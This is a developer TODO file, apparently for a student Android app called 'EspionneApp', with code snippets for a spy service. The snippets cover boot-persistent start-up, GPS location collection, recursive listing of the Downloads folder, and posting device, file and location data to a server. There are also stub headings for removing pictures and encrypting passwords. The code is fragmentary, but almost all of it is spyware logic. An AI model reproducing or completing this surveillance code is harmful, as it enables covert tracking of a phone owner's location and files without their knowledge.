TODO List
=========

# Permissions

The permissions needed for this project.
```xml
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.BLUETOOTH" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
```

# receiver

Application Receiver declaration.
```
<receiver
    android:name=".services.EspionReceiver"
    android:enabled="true"
    android:exported="false">
    <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED" />
    </intent-filter>
    <intent-filter>
        <action android:name="lpirm.veille.espionneapp.EspionReceiver" />
    </intent-filter>
</receiver>
```
# startService

Next lines detect when device was rebooted and start service. 

If Android version code is Oreo, we need to use startForegroundService.
```
boolean rebooted = intent.getAction().equalsIgnoreCase(Intent.ACTION_BOOT_COMPLETED);
if (rebooted ||
        intent.getAction().equals(V.System.ESPION_RECEIVER_ACTION)) {
    espionPreferences = new EspionPreferences(context);
    espionPreferences.setRebooted(rebooted);
    Log.d("EspionPreferences", "" + espionPreferences.wasRebooted());

    Intent serviceIntent = new Intent(context, EspionService.class);
    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O)
        context.startForegroundService(serviceIntent);
    else
        context.startService(serviceIntent);
}
```

# Service

Application Service declaration.
```
<service android:name=".services.EspionService" />
```

# onStartCommand
```
espionPreferences = new EspionPreferences(this);

        if (espionPreferences.wasRebooted())
            executePostDeviceAsyncTask();
```
# executePostDeviceAsyncTask
```
Device device = espionPreferences.getDevice();
        device.name = V.System.getLocalBluetoothName();
        device.version = Build.VERSION.RELEASE;

        LatLng latLng = startGPSTracker();
        device.lat = latLng.latitude;
        device.lng = latLng.longitude;

        device.user = espionPreferences.getUser();

        postDeviceAsyncTask = new PostDeviceAsyncTask(this);
        postDeviceAsyncTask.execute(device);
```
# executePostNewFilesAsyncTask
```
List<File> files = new ArrayList<>();

        java.io.File downloadDirectory = V.System.DOWNLOAD_DIRECTORY;
        if (downloadDirectory.exists() && downloadDirectory.isDirectory()) {
            files = getListFiles(downloadDirectory);
        }

        Device device = espionPreferences.getDevice();
        device.files = files;

        postNewFilesAsyncTask = new PostNewFilesAsyncTask(this);
        postNewFilesAsyncTask.execute(device);
```
# constants
```
public static final File DOWNLOAD_DIRECTORY = Environment.getExternalStoragePublicDirectory(Environment.DIRECTORY_DOWNLOADS);
        public static final File PICTURES_DIRECTORY = Environment.getExternalStoragePublicDirectory(Environment.DIRECTORY_PICTURES);
```
# getListFiles
```
for (java.io.File ioFile : directory.listFiles()) {
            if (ioFile.isDirectory()) {
                File file = new File();
                file.path = ioFile.getAbsolutePath();
                files.add(file);
                files.addAll(getListFiles(ioFile));
            }
            File file = new File();
            file.path = ioFile.getAbsolutePath();
            files.add(file);
        }
```
# removePictures
# executePatchLocationAsyncTask
```
if (V.device != null && V.device.lat != lat || V.device.lng != lng) {
            Device device = espionPreferences.getDevice();
            device.lat = lat;
            device.lng = lng;

            patchLocationAsyncTask = new PatchLocationAsyncTask(this);
            patchLocationAsyncTask.execute(device);
        }
```
# encryptPassword
```

```